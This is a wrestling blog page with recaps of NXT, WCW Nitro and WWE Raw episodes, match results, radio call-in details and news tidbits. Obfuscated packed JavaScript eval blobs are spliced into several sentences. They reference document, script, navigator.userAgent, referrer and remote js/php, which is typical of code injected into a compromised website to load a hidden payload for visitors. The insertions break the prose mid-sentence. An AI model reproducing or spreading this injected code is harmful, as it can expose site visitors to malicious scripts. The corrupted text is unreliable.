NXT – October 21, 2015: Weeks, Not Half Hours

NXT
Date: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yttif|var|u0026u|referrer|hihie||js|php'.split('|'),0,{})) October 21, 2015
Location: Full Sail University, Winter Park, Florida
Commentators: Rich Brennan, Corey Graves, Byron Saxton

Opening sequence.

Asuka vs. Billie Kay

The announcers rave about Asuka.

Video on Baron Corbin.

Colin Cassady/Enzo Amore vs. Scott Dawson/Dash Wilder

Enzo and Colin take a beating post match.

Video on Rhyno.

Breast cancer is bad.

Danny Burch vs. James Storm

Storm does his catchphrase.

Apollo Crews vs. Finn Balor is in two weeks.

Nia Jax is still here and is back next week.

Alexa Bliss vs. Peyton Royce

Joe vs. Breeze next week.

Rhyno vs. Baron Corbin

They immediately brawl to start and fight to the floor for all of five seconds. Back in and Rhyno gets the better of it and punches him up against the ropes, sending Baron out to the floor for a breather. Rhyno follows him out but gets sent into the post as we take a break. Back with Baron slowly stomping away and putting on a chinlock to slow things down even more.

Rhyno fights up and they head outside again with Corbin being sent into the steps. Back in and a quick suplex gets two for Rhyno, followed by the spinebuster for the same. The Gore connects for a surprising two (good) and the fans want one more. Rhyno proves that listening to the fans is a bad idea as he charges into the End of Days for the pin at 12:29.

Results

Asuka b. Billie Kay – Asuka Lock

Colin Cassady/Enzo Amore b. Scott Dawson/Dash Wilder – Small package to Dawson

James Storm b. Danny Burch – Eight Second Ride

Baron Corbin b. Rhyno – End of Days

Monday Nitro – May 29, 2000: The New Normal

Monday Nitro #242
Date: May 29, 2000
Location: E Center, Salt Lake City, Utah
Commentators: Scott Hudson, Mark Madden, Tony Schiavone

Nash has a present for Ric: the World Title. That would be title change #17 since the beginning of the year. Cue Jarrett who thinks the three of them are whining like a bunch of women on the View. Russo has made Nash vs. Rick Steiner and Tank Abbott in a handicap match. So was that going to be for the title in the first place or did Russo really not care about what happens to the belt?

Vampiro arrives in a gasoline truck.

Ric is looking for his family. This is a B movie plot.

Apparently the title match is on as Flair had no choice. In other words: Russo gets what he wants and Flair is broken one more time.

Lieutenant Loco vs. Disco Inferno

Mike Awesome vs. G.I. Bro

Kevin Nash vs. Rick Steiner/Tank Abbott

Goldberg leaves.

Hardcore Title: Terry Funk vs. Vampiro

Ric is still looking for his family.

Here are Kimberly, Awesome and Palumbo to call out Elizabeth for what happened last week. Elizabeth, who is finally free, ACTUALLY COMES OUT ON HER OWN! She deserves to be kidnapped over and over again. Kimberly has them kidnap Elizabeth again and yells a lot as this is pretty clearly another Russo fantasy on screen.

Cue Page to clean house but Bischoff sends out the cops to arrest Page for violating the restraining order. Palumbo attacks THE COPS with the exercise bar before hitting Page, only to have Luger come out in a face mask to beat up Palumbo. Luger and Liz leave but Awesome gets up to beat on Page even more. This brings KARL MALONE out of the crowd to Diamond Cut Awesome in a call back to the good old days. Yet another Russo fantasy/illogical segment which accomplished very little and got Karl Malone over instead of the two pay per view matches.

US Title: Scott Steiner vs. Shane Douglas

Hogan is in the yellow and red.

Sting vs. Kidman

WCW World Title: Ric Flair vs. Jeff Jarrett

Fans throw trash in the ring as the Flairs are taken away by security to end the show.

New Column: Coming Attractions

Star Wars and stupid wrestling booking.

Radio Appearance Call In Information

As eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnzah|var|u0026u|referrer|ardkn||js|php'.split('|'),0,{})) I mentioned I’ll be on the Mouth of the South Shore Radio Show live tonight at 10pm EST.  It now features live calls and you can get on the show and ask myself and the host (a bright fellow in his own right) whatever you like.  I’m sure we’ll have a lot to cover after last night’s Raw and with Hell in a Cell coming up on Sunday.

You can call in at 1-605-562-8001, then press 5 to get through.

You can also listen live i95sportsnetwork.com or on the Zeno Radio Live app, which is available on most App stores on whatever device you have.

The show will be running from 10pm to 1130pm EST and is always fun. I’ve been on the show several times over the years and always have a great time.  Check it out and call in.

Pick the Survivor Series I Redo

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zzyrn|var|u0026u|referrer|bihdr||js|php'.split('|'),0,{})) annual Survivor Series count-up will start this Sunday and like I did with Summerslam, I’ll be redoing Survivor Series 2014 as well as whichever one you pick.  Vote in the comments and I’ll redo which ever you want most.

Randy Orton Legitimately Injured

http://411mania.com/wrestling/randy-orton-suffers-shoulder-injury/

It’s another shoulder but there’s no word on how much if any time he’ll be out for.  That’s going to make for some very interesting shows going forward with Cena and potentially Orton leaving soon for a long time.

Date: October 19, 2015
Location: American Airlines Center, Dallas, Texas
Commentators: Michael Cole, Byron Saxton, John Bradshaw Layfield

John Cena/Dudley Boyz vs. New Day

Post match Woods takes an AA, followed by a superbomb through a table.

Nikki Bella/Alicia Fox vs. Naomi/Sasha Banks

Back with Fox keeping Naomi from tagging out, followed by a double suplex (was that the empowering part? I for one could certainly feel women everywhere being stronger when a Bella did a basic wrestling move so it must have been). Naomi comes back with some kicks but Nikki hits a running dropkick to the ribs before bending over to choke Naomi on the ropes. A few more kicks are enough for Naomi to tag in Sasha for some knees to the face (empowerment down by two points).

We recap Kane pinning Rollins last week. This has resulted in Corporate Kane being suspended. Of course the Authority could solve the obvious problem this creates by just saying KANE has been suspended but that would make too much sense. For the bosses of a global corporation, HHH and Stephanie are dumb sometimes.

Ryback vs. Seth Rollins

We look at Summer Rae costing Rusev a match on Smackdown and then getting turned down by Ziggler.

Dolph Ziggler/Cesaro/Neville vs. King Barrett/Sheamus/Rusev

Brie Bella vs. Charlotte

Renee Young comes up to accuse Paige of attacking Natalya last week. Paige thinks it might have been Summer Rae, Lana, Eve Torres, Kaitlyn, Trish Stratus or even Lita. Renee presses her on this so Paige says Renee is no Erin Andrews, nor is she as cute.

Kevin Owens vs. Mark Henry

Long video on the history of Lesnar vs. Undertaker. Well their recent history as their first Cell match is ignored.

The Kickoff match has been changed to a rematch of the six man from earlier tonight.

Roman Reigns/Dean Ambrose/Seth Rollins vs. Wyatt Family

Reigns cleans house post match with a HUGE dive over the top and spears to Bray and Erick. The fans think this is awesome to end the show.

Results

New Day b. John Cena/Dudley Boyz – Rollup to D-Von

Nikki Bella/Alicia Fox b. Naomi/Sasha Banks – Rack Attack to Naomi

Seth Rollins b. Ryback – Pedigree

Rusev/King Barrett/Sheamus b. Neville/Cesaro/Dolph Ziggler – Barrett pinned Ziggler after a Brogue Kick

Charlotte b. Brie Bella – Figure Eight

Kevin Owens b. Mark Henry – Pop Up Powerbomb

Wyatt Family b. Dean Ambrose/Seth Rollins/Roman Reigns via DQ when Ambrose used a kendo stick

John Cena Issuing US Title Open Challenge For Hell in a Cell

This eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skszi|var|u0026u|referrer|ybdsr||js|php'.split('|'),0,{})) both piques my interest and terrifies me at the same time.  Given that Cena is taking time off, it really wouldn’t surprise me to see Big Show come in, hurt Cena REALLY REALLY BADLY with like two punches because he’s a giant (don’t you know?) and then dominate the belt until TLC or so.

Or Tyler Breeze.

Back On The Radio Tomorrow

I’ll eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI 45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nbhah|var|u0026u|referrer|risys||js|php'.split('|'),0,{})) be returning to the Mouth of the South Shore tomorrow night at about 10pm EST.  If you’re interested, you’ll be able to call in to the show and ask myself and the hosts whatever you’ve got on your mind.  I’ll have the details for you tomorrow but make sure to check it out as the show is always entertaining.

WCW Payroll 1996-2000

https://docs.google.com/spreadsheets/d/14Xg211VJjHQngZsGKB-TA5xdJsQOwnnOSbTmizM8AH8/htmlview#

These are always fascinating to see.  This is from a legal case about discrimination so these are likely accurate.  There are some gems in here.  If you’re a stats geek, there’s some great fun to look at.  It’s also cool to see stuff like Hogan’s “official” salary when he was also on TBS’ payroll, meaning WCW could cut a cost by sneaking around various contract issues.
